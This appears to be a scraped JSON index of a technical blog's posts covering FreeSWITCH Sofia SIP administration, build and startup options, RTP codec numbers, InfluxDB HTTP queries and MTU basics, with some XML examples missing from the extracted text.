FreeSWITCH.On Linux, you may wish to try, as a superuser (often \u0026ldquo;root\u0026rdquo;):netstat -lunp | less# -l show listeners, -u show only UDP sockets,# -n numeric output (do not translate addresses or UDP port numbers)# -p show process information (PID, command). Only the superuser is allowed to see this infoWith the less search facility (usually the keystroke \u0026ldquo;/\u0026rdquo;), look for :5060 which is the usual SIP port.To narrow the focus, you can use grep. In the example configs, port 5060 is the \u0026ldquo;internal\u0026rdquo; profile. Try this:netstat -lnp | grep 5060See if something other than FreeSWITCH is using port 5060. Sofia Recover sofia recoverYou can ask Sofia to recover calls that were up, after crashing (or other scenarios).Sofia recover can also be used, if your core db uses ODBC to achieve HA / failover.For FreeSWITCH HA configuration, see Freeswitch HA. Flushing and rebooting registered endpoints You can flush a registration or reboot specific registered endpoint by issuing a flush_inbound_reg command from the console.freeswitch\u0026gt; sofia profile \u0026lt;profile_name\u0026gt; flush_inbound_reg [\u0026lt;call_id\u0026gt;|user@host] [reboot]If you leave out \u0026lt;call_id\u0026gt; and/or user@host, you will flush/reboot every registered endpoint on a profile.\nNote: For polycom phone, the command causes the phone to check its configuration from the server. If the file is different (you may add extra space at the end of file), the phone will reboot. You should not change the value of voIpProt.SIP.specialEvent.checkSync.alwaysReboot=\u0026ldquo;0\u0026rdquo; to \u0026ldquo;1\u0026rdquo; in sip.cfg as that allows potential a DOS attack on the phone. You can also use the check_sync command:sofia profile \u0026lt;profile_name\u0026gt; check_sync \u0026lt;call_id\u0026gt; | user@domain\nNote: The polycom phones do not reload -directory.xml configuration in response to either of these commands, they only reload the configuration. If you want new speed dials to take effect, you\u0026rsquo;ll need to do a full reboot of the phone or enable the alwaysReboot option. (Suggestions from anyone with more detailed PolyCom knowledge would be appreciated here.) Starting a new profile If you have created a new profile you need to start it from the console:freeswitch\u0026gt; sofia profile \u0026lt;new_profile_name\u0026gt; start Reloading profiles and gateways You can reload a specific SIP profile by issuing a rescan/restart command from the consolefreeswitch\u0026gt; sofia profile \u0026lt;profile_name\u0026gt; [|] reloadxmlThe difference between rescan and restart is that rescan will just load new config and not stop FreeSWITCH from processing any more calls on a profile.** Some config options like IP address and (UDP) port are not reloaded with rescan.** Deleting gateways You can delete a specific gateway by issuing a killgw command from the console. If you use all as gateway name, all gateways will be killedfreeswitch\u0026gt; sofia profile \u0026lt;profile_name\u0026gt; killgw \u0026lt;gateway_name\u0026gt; Restarting gateways You can force a gateway to restart ( good for forcing a re-registration or similar ) by issuing a killgw command from the console followed by a profile rescan. This is safe to perform on a profile that has active calls.freeswitch\u0026gt; sofia profile \u0026lt;profile_name\u0026gt; killgw \u0026lt;gateway_name\u0026gt;freeswitch\u0026gt; sofia profile \u0026lt;profile_name\u0026gt; rescan Adding / Changing Existing Gateways It will be assumed that you have all your gateways in the /usr/local/freeswitch/conf/sip_profiles/external directory and that you have just created a new entry. You can add a new gateway to FreeSWITCH by issuing a rescan reloadxml command from the console as seen in the example below. This will load the newly created gateway and not affect any calls that are currently up.freeswitch\u0026gt; sofia profile external rescan reloadxml\nYou now realize that you have screwed up the IP address in the new gateway and need to change it. So you edit your gateway file and make any changes that you want. You will then need to issue the following commands to destroy the gateway, and then have FreeSWITCH reload the changes with affecting any existing calls that are currently up.\nfreeswitch\u0026gt; sofia profile external killgw \u0026lt;gateway_name\u0026gt;freeswitch\u0026gt; sofia profile external rescan reloadxml View SIP Registrations You can view all the devices that have registered by running the following from the console.freeswitch\u0026gt; sofia status profile regfreeswitch\u0026gt; sofia status profile default regfreeswitch\u0026gt; sofia status profile outbound regYou can also use the xmlstatus key to retrieve statuses in XML format. This is specially useful if you are using mod_xml_rpc.Commands are as follows:freeswitch\u0026gt; sofia xmlstatus profile regfreeswitch\u0026gt; sofia xmlstatus profile default regfreeswitch\u0026gt; sofia xmlstatus profile outbound reg List the status of gateways For the gateways that are in-service:freeswitch\u0026gt; sofia profile gwlist upFor the gateways that are out-of-service:freeswitch\u0026gt; sofia profile gwlist downNotes:\nIt should be used together with . See Sofia_Configuration_Files It can also be used to feed into mod distributor to exclude dead gateways. List gateway data To retrieve the value of an inbound variable:sofia_gateway_data \u0026lt;gateway_name\u0026gt; ivar To retrieve the value of an outbound variable:sofia_gateway_data \u0026lt;gateway_name\u0026gt; ovar To retrieve the value of either use:sofia_gateway_data \u0026lt;gateway_name\u0026gt; var This first checks for an inbound variable, then checks for an outbound variable if there\u0026rsquo;s no matching inbound. View User Presence Data Displays presence data from registered devices as seen by the serverUsage:sofia_presence_data [list|status|rpid|user_agent] [profile/]@domainsofia_presence_data list */2005status|rpid|user_agent|network_ip|network_portAway|away|Bria 3 release 3.5.1 stamp 69738|192.168.20.150|21368+OK\nIts possible to retrieve only one valuesofia_presence_data status */2005Away\nYou can use this value in the dialplan, e.g. Debugging Sofia-SIP The Sofia-SIP components can output various debugging information. The detail of the debugging output is determined by the debugging level. The level is usually module-specific and it can be modified by module-specific environment variable. There is also a default level for all modules, controlled by environment variable #SOFIA_DEBUG.The environment variables controlling the logging and other debug output are as follows:- #SOFIA_DEBUG Default debug level (0..9)- #NUA_DEBUG User Agent engine (nua) debug level (0..9)- #SOA_DEBUG SDP Offer/Answer engine (soa) debug level (0..9)- #NEA_DEBUG Event engine (nea) debug level (0..9)- #IPTSEC_DEBUG HTTP/SIP authentication module debug level (0..9)- #NTA_DEBUG Transaction engine debug level (0..9)- #TPORT_DEBUG Transport event debug level (0..9)- #TPORT_LOG If set, print out all parsed SIP messages on transport layer- #TPORT_DUMP Filename for dumping unparsed messages from transport- #SU_DEBUG su module debug level (0..9)The defined debug output levels are:- 0 SU_DEBUG_0() - fatal errors, panic- 1 SU_DEBUG_1() - critical errors, minimal progress at subsystem level- 2 SU_DEBUG_2() - non-critical errors- 3 SU_DEBUG_3() - warnings, progress messages- 5 SU_DEBUG_5() - signaling protocol actions (incoming packets, \u0026hellip;)- 7 SU_DEBUG_7() - media protocol actions (incoming packets, \u0026hellip;)- 9 SU_DEBUG_9() - entering/exiting functions, very verbatim progressStarting with 1.0.4, those parameters can be controlled from the console by doingfreeswitch\u0026gt; sofia loglevel \u0026lt;all|default|tport|iptsec|nea|nta|nth_client|nth_server|nua|soa|sresolv|stun\u0026gt; [0-9]\u0026ldquo;all\u0026rdquo; Will change every component\u0026rsquo;s loglevelA log level of 0 turns off debugging, to turn them all off, you can dofreeswitch\u0026gt; sofia loglevel all 0To report a bug, you can turn on debugging with more verbosesofia global siptrace onsofia loglevel all 9sofia tracelevel alertconsole loglevel debugfsctl debug_level 10 Debugging presence and SLA As of Jan 14, 2011, sofia supports a new debugging command: sofia global debug. It can turn on debugging for SLA, presence, or both. Usage is:sofia global debug slasofia global debug presencesofia global debug noneThe first two enable debugging SLA and presence, respectively. The third one turns off SLA and/or presence debugging. Sample Export (Linux/Unix) Alternatively, the levels can also be read from environment variables. The following bash commands turn on all debugging levels, and is equivalent to \u0026ldquo;sofia loglevel all 9\u0026rdquo;export SOFIA_DEBUG=9export NUA_DEBUG=9export SOA_DEBUG=9export NEA_DEBUG=9export IPTSEC_DEBUG=9export NTA_DEBUG=9export TPORT_DEBUG=9export TPORT_LOG=9export TPORT_DUMP=/tmp/tport_sip.logexport SU_DEBUG=9To turn this debugging off again, you have to exit FreeSWITCH and type unset. For example:unset TPORT_LOG Sample Set (Windows) The following bash commands turn on all debugging levels.set SOFIA_DEBUG=9set NUA_DEBUG=9set SOA_DEBUG=9set NEA_DEBUG=9set IPTSEC_DEBUG=9set NTA_DEBUG=9set TPORT_DEBUG=9set TPORT_LOG=9set TPORT_DUMP=/tmp/tport_sip.logset SU_DEBUG=9To turn this debugging off again, you have to exit FreeSWITCH and type unset. For example:set TPORT_LOG=You can also control SIP Debug output within fs_cli, the FreeSWITCH client app.freeswitch\u0026gt; sofia profile siptrace on|offOn newer software release, you can now be able to issue siptrace for all profiles:sofia global siptrace [on|off]\nTo have the SIP Debug details put in the /usr/local/freeswitch/log/freeswitch.log file, usefreeswitch\u0026gt; sofia tracelevel info (or any other loglevel name or number)To have the SIP details put into the log file automatically on startup, add this to sofia.conf.xml:\u0026lt;global_settings\u0026gt;\u0026hellip;\u0026hellip;\u0026lt;/global_settings\u0026gt;\nand the following to the sip profile xml file:\u0026hellip;\u0026hellip;\u0026hellip;\u0026hellip;\nProfile Configurations Track Call ACL You can restrict access by IP address for either REGISTERs or INVITEs (or both) by using the following options in the sofia profile.See ACL for other access controlsSee acl.conf.xml for list configuration Disabling Hold Disable all calls on this profile from putting the call on hold:\nSee also: rtp_disable_hold variable Using A Single Domain For All Registrations You can force all registrations in a particular profile to use a single domain. In other words, you can ignore the domain in the SIP message. You will need to modify several sofia profile settings. challenge realm auto_from - uses the from field as the value for the SIP realm. auto_to - uses the to field as the value for the SIP realm. - you can input any value to use for the SIP realm. force-register-domain Preference Weight Transport Port Address================================================================================1 0.500 udp 5060 74.51.38.151 0.500 tcp 5060 74.51.38.15 Flushing Inbound Registrations From time to time, you may need to kill a registration.You can kill a registration from the CLI, or anywhere that accepts API commands with a command similar to the following:sofia profile \u0026lt;profile_name_here\u0026gt; flush_inbound_reg [optional_callid] Dial out of a gateway Basic form:sofia/gateway//\u0026lt;number_to_dial\u0026gt;Example 1:sofia/gateway/asterlink/18005551212gateway: is a keyword and not a \u0026ldquo;gateway\u0026rdquo; name. It has special meaning and tells the stack which credentials to use when challenged for the call. is the actual name of the gateway through which you want to send the call\nYour available gateways (usually configured in conf/sip_profiles/external/*.xml) will show up in sofia status:freeswitch#\u0026gt; sofia status\nName Type Data State=================================================================================================default profile sip:mod_sofia@2.3.4.5:5060 RUNNING (2)mygateway gateway sip:username@1.2.3.4 NOREGphonebooth.example.com alias default ALIASED=================================================================================================1 profile 1 alias Modifying the To: header You can override the To: header by appending ^.Example 1:sofia/foo/user%192.168.1.1^101@$${domain}\nSpecifying SIP Proxy With fs_path You can route a call through a specific SIP proxy by using the \u0026ldquo;fs_path\u0026rdquo; directive. Example:sofia/foo/user@that.domain;fs_path=sip:proxy.this.domain Safe SIP URI Formatting As of commit https://freeswitch.org/stash/projects/FS/repos/freeswitch/commits/76370f4d1767bb0dcf828a3d6cde6e015b2cfa03 the User part of the SIP URI has been \u0026ldquo;safely\u0026rdquo; encoded in the case where spaces or other special characters appear.\nChannel Variables Adding Request Headers You can add arbitrary headers to outbound SIP calls by prefixing the string \u0026lsquo;sip_h_\u0026rsquo; to any channel variable, for example:Note that for BYE requests, you will need to use the prefix \u0026lsquo;sip_bye_h_\u0026rsquo; on the channel variable.\nWhile not required, you should prefix your headers with \u0026ldquo;X-\u0026rdquo; to avoid issues with interoperability with other SIP stacks.All inbound SIP calls will install any X- headers into local variables.This means you can easily bridge any X- header from one FreeSWITCH instance to another.To access the header above on a 2nd box, use the channel variable ${sip_h_X-Answer}It is important to note that the syntax ${sip_h_custom-header} can\u0026rsquo;t be used to retrieve any custom header not starting with X-.It is because Sofia only reads and puts into variables custom headers starting with X-.\nAdding Response Headers There are three types of response header prefixes that can be set:\nResponse headersip_rh_ Provisional response headersip_ph_ Bye response headersip_bye_h_ Each prefix will exclusively add headers for their given types of requests - there is no \u0026ldquo;global\u0026rdquo; response header prefix that will add a header to all response messages.For example:\nAdding Custom Headers For instance, you may need P-Charge-Info to append to your INVITE header, you may do as follows:Then, you would see it in SIP message:INVITE sip:19099099099@1.2.3.4 SIP/2.0Via: SIP/2.0/UDP 5.6.7.8:5080;rport;branch=z9hG4bKyg61X9v3gUD4gMax-Forwards: 69From: \u0026ldquo;DJB\u0026rdquo; sip:2132132132@5.6.7.8;tag=XQKQ322vQF5gKTo: sip:19099099099@1.2.3.4Call-ID: b6c776f6-47ed-1230-0085-000f1f659e58CSeq: 30776798 INVITEContact: sip:mod_sofia@5.6.7.8:5080User-Agent: FreeSWITCH-mod_sofia/1.2.0-rc2+git~20120713T162602Z~0afd7318bd+unclean~20120713T184029ZAllow: INVITE, ACK, BYE, CANCEL, OPTIONS, MESSAGE, UPDATE, INFO, REGISTER, REFER, NOTIFYSupported: timer, precondition, path, replacesAllow-Events: talk, hold, conference, referContent-Type: application/sdpContent-Disposition: sessionContent-Length: 229P-Charge-Info: sip:2132132132@5.6.7.8;npi=0;noa=3X-FS-Support: update_display,send_info.Remote-Party-ID: \u0026ldquo;DJB\u0026rdquo; sip:2132132132@5.6.7.8;party=calling;screen=yes;privacy=off Strip Individual SIP Headers Sometimes a SIP provider will add extra header information. Most of the time they do that for their own use (tracking calls). But that extra information can cause a lot of problems. For example: I get a call from the PSTN via a DID provider (provider1). Since im not in the office the call gets bridged to my cell phone (provider2). Provider1 add\u0026rsquo;s extra information to the sip packet like displayed below:X-voipnow-did: 01234567890X-voipnow-extension: 987654321\u0026hellip;In some scenario, we bridge this call directly to provider2 the calls get dropped since provider2 doesnt accept the X-voipnow header, so we have to strip off those SIP headers.To strip them off, use the application UNSET in the dialplan (the inverse of SET):\u0026hellip; Strip All custom SIP Headers If you wish to strip all custom headers while keeping only those defined in dialplan:\u0026hellip; Additional Channel variables Additional variables may also be set to influence the way calls are handled by sofia.For example, contacts can be filtered by setting the \u0026lsquo;sip_exclude_contact\u0026rsquo; variable. Example:Or you can perform SIP Digest authorization on outgoing calls by setting sip_auth_username and sip_auth_password variables to avoid using Gateways to authenticate. Example:Changing the SIP Contact user FreeSWITCH normally uses mod_sofia@ip:port for the internal SIP contact. To change this to foo@ip:port, there is a variable, sip_contact_user:{sip_contact_user=foo}sofia/my_profile/1234@192.168.0.1;transport=tcp sip_renegotiate_codec_on_reinvite true|false sip_recovery_break_rfc true|false Transcoding Issues G729 and G723 will not let you transcode because of licensing issues. Calls will fail if for example originating endpoint has set G729 with higher priority and receiving endpoint has G723 with highest priority. The logic is to fail the call rather than attempt to find a codec match. If you are having issues due to transcoding you may disable transcoding and both endpoints will negotiate the compatible codec rather than just fail the call.disable-transcoding will take the preferred codec from the inbound leg of your call and only offer that codec on the outbound leg.Add the following command along with to your sofia profile\nExample:\nCustom Events The following are events that can be subscribed to via Event Socket\nRegistration sofia::register* sofia::pre_register* sofia::register_attempt* sofia::register_failure* sofia::unregister - explicit unregister calls* sofia::expire - when a user registration expires Gateways sofia::gateway_add* sofia::gateway_delete* sofia::gateway_state - when a gateway is detected as down or back up Call recovery sofia::recovery_send* sofia::recovery_recv* sofia::recovery_recovered Other sofia::notify_refer* sofia::reinvite* sofia::error FAQ Does it use UDP or TCP? By default it uses both, but you can add ;transport=tcp to the Sofia URL to force it to use TCP.For example:sofia/profile/foo@bar.com;transport=tcpAlso there is a parameter in the gateway config:That will cause it to use the TCP transport for the registration and all subsequent SIP messages.Not sure if this is needed or what it does, but the following can also be used in gateway settings:\n","permalink":"https://wdd.js.org/freeswitch/sofia-stack/","summary":"Sofia is a SIP stack used by FreeSWITCH. When you see \u0026ldquo;sofia\u0026rdquo; anywhere in your configuration, think \u0026ldquo;This is SIP stuff.\u0026rdquo; It takes a while to master it all, so please be patient with yourself. SIP is a crazy protocol and it will make you crazy too if you aren\u0026rsquo;t careful. Read on for information on setting up SIP/Sofia in your FreeSWITCH configuration.\nmod_sofia exposes the Sofia API and sets up the FreeSWITCH SIP endpoint.","title":"Sofia SIP Stack"},{"content":" make clean - Cleans the build environment make current - Cleans build environment, performs an git update, then does a make install make core_install (or make install_core) - Recompiles and installs just the core files. Handy if you are working on a core file and want to recompile without doing the whole shebang. make mod_XXXX-install - Recompiles and installs just a single module. Here are some examples: make mod_openzap-install make mod_sofia-install make mod_lcr-install make samples - This will not replace your configuration. This will instead make the default extensions and dialplan to run the basic configuration of FreeSWITCH. ","permalink":"https://wdd.js.org/freeswitch/compile-fs/","summary":"make clean - Cleans the build environment make current - Cleans build environment, performs an git update, then does a make install make core_install (or make install_core) - Recompiles and installs just the core files. Handy if you are working on a core file and want to recompile without doing the whole shebang. make mod_XXXX-install - Recompiles and installs just a single module. Here are some examples: make mod_openzap-install make mod_sofia-install make mod_lcr-install make samples - This will not replace your configuration.","title":"编译FS"},{"content":"\n运行fs 前台运行 freeswitch 后台运行 freeswich -nc 参数列表 These are the optional arguments you can pass to freeswitch:\nFreeSWITCH startup switches\n-waste -- allow memory waste -no-auto-stack -- don\u0026#39;t adjust thread stack size -core -- dump cores -help -- print this message -version -- print the version and exit -rp -- enable high(realtime) priority settings -lp -- enable low priority settings -np -- enable normal priority settings (system default) -vg -- run under valgrind -nosql -- disable internal SQL scoreboard -heavy-timer -- Heavy Timer, possibly more accurate but at a cost -nonat -- disable auto NAT detection -nonatmap -- disable auto NAT port mapping -nocal -- disable clock calibration -nort -- disable clock clock_realtime -stop -- stop freeswitch -nc -- no console and run in background -ncwait -- no console and run in background, but wait until the system is ready before exiting (implies -nc) -c -- output to a console and stay in the foreground (default behavior) UNIX-like only -nf -- no forking -u [user] -- specify user to switch to -g [group] -- specify group to switch to -ncwait -- do not output to a console and background but wait until the system is ready before exiting (implies -nc) Windows-only -service [name] \u0026ndash; start freeswitch as a service, cannot be used if loaded as a console app-install [name] \u0026ndash; install freeswitch as a service, with optional service name-uninstall \u0026ndash; remove freeswitch as a service-monotonic-clock \u0026ndash; use monotonic clock as timer source\nFile locations -base [basedir] \u0026ndash; alternate prefix directory-conf [confdir] \u0026ndash; alternate directory for FreeSWITCH configuration files-log [logdir] \u0026ndash; alternate directory for logfiles-run [rundir] \u0026ndash; alternate directory for runtime files-db [dbdir] \u0026ndash; alternate directory for the internal database-mod [moddir] \u0026ndash; alternate directory for modules-htdocs [htdocsdir] \u0026ndash; alternate directory for htdocs-scripts [scriptsdir] \u0026ndash; alternate directory for scripts-temp [directory] \u0026ndash; alternate directory for temporary files-grammar [directory] \u0026ndash; alternate directory for grammar files-recordings [directory] \u0026ndash; alternate directory for recordings-storage [directory] \u0026ndash; alternate directory for voicemail storage-sounds [directory] \u0026ndash; alternate directory for sound filesIf you set the file locations of any one of -conf, -log, or -db you must set all three. File Paths A handy method to determine where FreeSWITCH™ is currently looking for files (in linux):Method for showing FS paths\nbash\u0026gt; fs_cli -x \u0026#39;global_getvar\u0026#39;| grep _dir base_dir=/usrrecordings_dir=/var/lib/freeswitch/recordingssounds_dir=/usr/share/freeswitch/soundsconf_dir=/etc/freeswitchlog_dir=/var/log/freeswitchrun_dir=/var/run/freeswitchdb_dir=/var/lib/freeswitch/dbmod_dir=/usr/lib/freeswitch/modhtdocs_dir=/usr/share/freeswitch/htdocsscript_dir=/usr/share/freeswitch/scriptstemp_dir=/tmpgrammar_dir=/usr/share/freeswitch/grammarfonts_dir=/usr/share/freeswitch/fontsimages_dir=/var/lib/freeswitch/imagescerts_dir=/etc/freeswitch/tlsstorage_dir=/var/lib/freeswitch/storagecache_dir=/var/cache/freeswitchdata_dir=/usr/share/freeswitchlocalstate_dir=/var/lib/freeswitchArgument CautionsSetting some arguments may affect behavior in unexpected ways. The following list contains known side-effects of setting various command line arguments.* nosql - Setting nosql completely disables the use of coreDB which means you will not have show channels, show calls, tab completion, or anything else that is stored in the coreDB.\n","permalink":"https://wdd.js.org/freeswitch/command-line/","summary":"运行fs 前台运行 freeswitch 后台运行 freeswich -nc 参数列表 These are the optional arguments you can pass to freeswitch:\nFreeSWITCH startup switches\n-waste -- allow memory waste -no-auto-stack -- don\u0026#39;t adjust thread stack size -core -- dump cores -help -- print this message -version -- print the version and exit -rp -- enable high(realtime) priority settings -lp -- enable low priority settings -np -- enable normal priority settings (system default) -vg -- run under valgrind -nosql -- disable internal SQL scoreboard -heavy-timer -- Heavy Timer, possibly more accurate but at a cost -nonat -- disable auto NAT detection -nonatmap -- disable auto NAT port mapping -nocal -- disable clock calibration -nort -- disable clock clock_realtime -stop -- stop freeswitch -nc -- no console and run in background -ncwait -- no console and run in background, but wait until the system is ready before exiting (implies -nc) -c -- output to a console and stay in the foreground (default behavior) UNIX-like only -nf -- no forking -u [user] -- specify user to switch to -g [group] -- specify group to switch to -ncwait -- do not output to a console and background but wait until the system is ready before exiting (implies -nc) Windows-only -service [name] \u0026ndash; start freeswitch as a service, cannot be used if loaded as a console app-install [name] \u0026ndash; install freeswitch as a service, with optional service name-uninstall \u0026ndash; remove freeswitch as a service-monotonic-clock \u0026ndash; use monotonic clock as timer source","title":"fs 命令行"},{"content":" Item Reload Command Notes XML Dialplan reloadxml Run each time you edit XML dial file(s) ACLs reloadacl Edit acl.conf.xml first Voicemail reload mod_voicemail Edit voicemail.conf.xml first Conference reload mod_conference Edit conference.conf.xml first Add Sofia Gateway sofia profile rescan Less intrusive - no calls dropped Remove Sofia Gateway sofia profile killgw \u0026lt;gateway_name\u0026gt; Less intrusive - no calls dropped Restart Sofia Gateway sofia profile killgw \u0026lt;gateway_name\u0026gt;sofia profile rescan Less intrusive - no calls dropped Add/remove Sofia Gateway sofia profile restart More intrusive - all profile calls dropped Local Stream see Mod_local_stream Edit localstream.conf.xml first Update a lua file nothing necessary file is loaded from disk each time it is run Update LCR SQL table nothing necessary SQL query is run for each new call Update LCR options reload mod_lcr Edit lcr.conf.xml first Update CID Lookup Options reload mod_cidlookup Edit cidlookup.conf.xml first Update JSON CDR Options reload mod_json_cdr Edit json_cdr.conf.xml first Update XML CDR Options reload mod_xml_cdr Edit xml_cdr.conf.xml first Update XML CURL Server Response nothing, unless using cache ","permalink":"https://wdd.js.org/freeswitch/reload/","summary":"Item Reload Command Notes XML Dialplan reloadxml Run each time you edit XML dial file(s) ACLs reloadacl Edit acl.conf.xml first Voicemail reload mod_voicemail Edit voicemail.conf.xml first Conference reload mod_conference Edit conference.conf.xml first Add Sofia Gateway sofia profile rescan Less intrusive - no calls dropped Remove Sofia Gateway sofia profile killgw \u0026lt;gateway_name\u0026gt; Less intrusive - no calls dropped Restart Sofia Gateway sofia profile killgw \u0026lt;gateway_name\u0026gt;sofia profile rescan Less intrusive - no calls dropped Add/remove Sofia Gateway sofia profile restart More intrusive - all profile calls dropped Local Stream see Mod_local_stream Edit localstream.","title":"fs reload命令"},{"content":"v=0 o=WMSWMS 1562204406 1562204407 IN IP4 192.168.40.79 s=WMSWMS c=IN IP4 192.168.40.79 t=0 0 m=audio 31114 RTP/AVP 0 8 9 101 a=rtpmap:0 PCMU/8000 a=rtpmap:8 PCMA/8000 a=rtpmap:9 G722/8000 a=rtpmap:101 telephone-event/8000 a=fmtp:101 0-16 a=ptime:20 上面的SDP协议,我们只关注媒体编码部分,其中\nm=audio 31114 RTP/AVP 0 8 9 101 a=rtpmap:0 PCMU/8000 a=rtpmap:8 PCMA/8000 a=rtpmap:9 G722/8000 m字段audio说明是音频 31114是rtp的发送端口,一般rtp端口都是偶数,偶数后面的一个奇数端口是给rtcp端口的 0 8 9 101就是媒体编码,每个整数代表一个编码,其中96以下的是都是用IANA规定的,可以不用下面的rtpmap字段去指定,96以上的属于动态编码,需要用rtpmap去指定 上面是整个编码表,我们只需要记住几个就可以:\n0 PCMU/8000 3 GSM/8000 8 PCMA/8000 9 G722/8000 18 G729/8000 102 DTMF/8000 a=rtpmap:101 telephone-event/8000a=fmtp:101 0-16上面的字段描述的是DTMP的支持。DTMF标准,所有SIP实体至少支持0-15的DTMF事件。\n0-9是数字 10是* 11是# 12-15对应A,B,C,D 参考 https://www.iana.org/assignments/rtp-parameters/rtp-parameters.xhtml https://www.3cx.com/blog/voip-howto/sdp-voip2/ https://www.3cx.com/blog/voip-howto/sdp-voip/ ","permalink":"https://wdd.js.org/opensips/ch4/codec-table/","summary":"v=0 o=WMSWMS 1562204406 1562204407 IN IP4 192.168.40.79 s=WMSWMS c=IN IP4 192.168.40.79 t=0 0 m=audio 31114 RTP/AVP 0 8 9 101 a=rtpmap:0 PCMU/8000 a=rtpmap:8 PCMA/8000 a=rtpmap:9 G722/8000 a=rtpmap:101 telephone-event/8000 a=fmtp:101 0-16 a=ptime:20 上面的SDP协议,我们只关注媒体编码部分,其中\nm=audio 31114 RTP/AVP 0 8 9 101 a=rtpmap:0 PCMU/8000 a=rtpmap:8 PCMA/8000 a=rtpmap:9 G722/8000 m字段audio说明是音频 31114是rtp的发送端口,一般rtp端口都是偶数,偶数后面的一个奇数端口是给rtcp端口的 0 8 9 101就是媒体编码,每个整数代表一个编码,其中96以下的是都是用IANA规定的,可以不用下面的rtpmap字段去指定,96以上的属于动态编码,需要用rtpmap去指定 上面是整个编码表,我们只需要记住几个就可以:\n0 PCMU/8000 3 GSM/8000 8 PCMA/8000 9 G722/8000 18 G729/8000 102 DTMF/8000 a=rtpmap:101 telephone-event/8000a=fmtp:101 0-16上面的字段描述的是DTMP的支持。DTMF标准,所有SIP实体至少支持0-15的DTMF事件。\n0-9是数字 10是* 11是# 12-15对应A,B,C,D 参考 https://www.","title":"rtp编码表"},{"content":" 查询某个字段 q=SELECT real_used_size FROM opensips WHERE time \u0026gt; \u0026#39;2019-12-05T00:10:00Z\u0026#39; 正常查询结果,下面是例子,和上面的sql没有关系。\n:::warning 时间必须用单引号括起来,不能用双引号,格式也必须是YYYY-MM-DDTHH:MM:SSZ :::\n{ \u0026#34;results\u0026#34;: [ { \u0026#34;statement_id\u0026#34;: 0, \u0026#34;series\u0026#34;: [ { \u0026#34;name\u0026#34;: \u0026#34;cpu_load_short\u0026#34;, \u0026#34;columns\u0026#34;: [ \u0026#34;time\u0026#34;, \u0026#34;value\u0026#34; ], \u0026#34;values\u0026#34;: [ [ \u0026#34;2015-01-29T21:55:43.702900257Z\u0026#34;, 2 ], [ \u0026#34;2015-01-29T21:55:43.702900257Z\u0026#34;, 0.55 ], [ \u0026#34;2015-06-11T20:46:02Z\u0026#34;, 0.64 ] ] } ] } ] } 如果有报错,数组项中的某一个会有error属性,值为报错原因\n{ \u0026#34;results\u0026#34;:[ { \u0026#34;statement_id\u0026#34;: 0, \u0026#34;error\u0026#34;: \u0026#34;invalid operation: time and *influxql.StringLiteral are not compatible\u0026#34; } ] } 批次查询 语句之间用分号隔开\nq=SELECT real_used_size FROM opensips WHERE time \u0026gt; \u0026#39;2019-12-05T00:10:00Z\u0026#39;;SELECT real_used_size FROM opensips WHERE time \u0026gt; \u0026#39;2019-12-09T00:10:00Z\u0026#39; 返回结果中的statement_id就表示对应的语句\n{ \u0026#34;results\u0026#34;: [ { \u0026#34;statement_id\u0026#34;: 0, \u0026#34;series\u0026#34;: [ { \u0026#34;name\u0026#34;: \u0026#34;cpu_load_short\u0026#34;, \u0026#34;columns\u0026#34;: [ \u0026#34;time\u0026#34;, \u0026#34;value\u0026#34; ], \u0026#34;values\u0026#34;: [ [ \u0026#34;2015-01-29T21:55:43.702900257Z\u0026#34;, 2 ], [ \u0026#34;2015-01-29T21:55:43.702900257Z\u0026#34;, 0.55 ], [ \u0026#34;2015-06-11T20:46:02Z\u0026#34;, 0.64 ] ] } ] }, { \u0026#34;statement_id\u0026#34;: 1, \u0026#34;series\u0026#34;: [ { \u0026#34;name\u0026#34;: \u0026#34;cpu_load_short\u0026#34;, \u0026#34;columns\u0026#34;: [ \u0026#34;time\u0026#34;, \u0026#34;count\u0026#34; ], \u0026#34;values\u0026#34;: [ [ \u0026#34;1970-01-01T00:00:00Z\u0026#34;, 3 ] ] } ] } ] } 查询结果 按分钟求平均值 q=SELECT MEAN(real_used_size) FROM opensips WHERE time \u0026gt; \u0026#39;2019-12-05T03:10:00Z\u0026#39; GROUP BY time(1m) 其他查询参数 chunked=[true | db=\u0026lt;database_name\u0026gt; epoch=[ns,u,µ,ms,s,m,h] p= pretty=true q= u= 参考教程 报错处理 https://docs.influxdata.com/influxdb/v1.7/troubleshooting/errors/ 数据查询 https://docs.influxdata.com/influxdb/v1.6/guides/querying_data/ 函数 https://docs.influxdata.com/influxdb/v1.7/query_language/functions/ ","permalink":"https://wdd.js.org/posts/2019/12/pv5xgz/","summary":"查询某个字段 q=SELECT real_used_size FROM opensips WHERE time \u0026gt; \u0026#39;2019-12-05T00:10:00Z\u0026#39; 正常查询结果,下面是例子,和上面的sql没有关系。\n:::warning 时间必须用单引号括起来,不能用双引号,格式也必须是YYYY-MM-DDTHH:MM:SSZ :::\n{ \u0026#34;results\u0026#34;: [ { \u0026#34;statement_id\u0026#34;: 0, \u0026#34;series\u0026#34;: [ { \u0026#34;name\u0026#34;: \u0026#34;cpu_load_short\u0026#34;, \u0026#34;columns\u0026#34;: [ \u0026#34;time\u0026#34;, \u0026#34;value\u0026#34; ], \u0026#34;values\u0026#34;: [ [ \u0026#34;2015-01-29T21:55:43.702900257Z\u0026#34;, 2 ], [ \u0026#34;2015-01-29T21:55:43.702900257Z\u0026#34;, 0.55 ], [ \u0026#34;2015-06-11T20:46:02Z\u0026#34;, 0.64 ] ] } ] } ] } 如果有报错,数组项中的某一个会有error属性,值为报错原因\n{ \u0026#34;results\u0026#34;:[ { \u0026#34;statement_id\u0026#34;: 0, \u0026#34;error\u0026#34;: \u0026#34;invalid operation: time and *influxql.StringLiteral are not compatible\u0026#34; } ] } 批次查询 语句之间用分号隔开","title":"influxdb HTTP 接口学习"},{"content":"sngrep长时间抓包会导致内存堆积,所以sngrep只适合短时间分析抓包,长时间抓包需要用tcp-dump\n","permalink":"https://wdd.js.org/opensips/tools/tcp-dump/","summary":"sngrep长时间抓包会导致内存堆积,所以sngrep只适合短时间分析抓包,长时间抓包需要用tcp-dump","title":"tcp-dump"},{"content":"最大传输单元MTU 以太网和802.3对数据帧的长度有个限制,其最大长度分别是1500和1942。链路层的这个特性称作MTU, 最大传输单元。不同类型的网络大多数都有一个限制。\n如果IP层的数据报的长度比链路层的MTU大,那么IP层就需要分片,每一片的长度要小于MTU。\n使用netstat -in可以打印出网络接口的MTU\n➜ ~ netstat -in Kernel Interface table Iface MTU Met RX-OK RX-ERR RX-DRP RX-OVR TX-OK TX-ERR TX-DRP TX-OVR Flg eth2 1500 0 1078767768 2264 689 0 1297577913 0 0 0 BMRU lo 16436 0 734474 0 0 0 